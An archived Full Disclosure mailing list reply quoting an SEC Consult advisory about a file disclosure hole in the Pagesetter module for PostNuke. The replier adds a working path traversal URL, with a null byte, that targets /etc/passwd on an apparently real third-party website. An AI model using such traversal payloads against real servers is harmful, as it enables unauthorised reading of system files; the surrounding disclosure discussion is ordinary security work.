Full Disclosure mailing list archives

Re: SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke

From: Matthew Flaschen <matthew.flaschen () gatech edu>
Date: Tue, 27 Feb 2007 04:02:05 -0500

research () sec-consult com wrote:

SEC Consult Security Advisory 20070226-0
=======================================================================
                  title: File Disclosure in Pagesetter for PostNuke
                program: Pagesetter page creation module
     vulnerable version: 6.2.0
                         6.3.0 beta 5
                 impact: high
               homepage: http://www.elfisk.dk
                  found: 2006-11-21
                     by: D. Matscheko / SEC-CONSULT /
www.sec-consult.com
=======================================================================

vendor description:
---------------

Pagesetter is a publishing module that allows the PostNuke users to
create web pages from structured data, with the data structure and
output templates defined by the PostNuke administrator.

[Source: http://www.elfisk.dk]


I think brendanb's going to be busy.

http://www.nesco.com.au/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke research (Feb 26)
- Re: SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke Matthew Flaschen (Feb 27)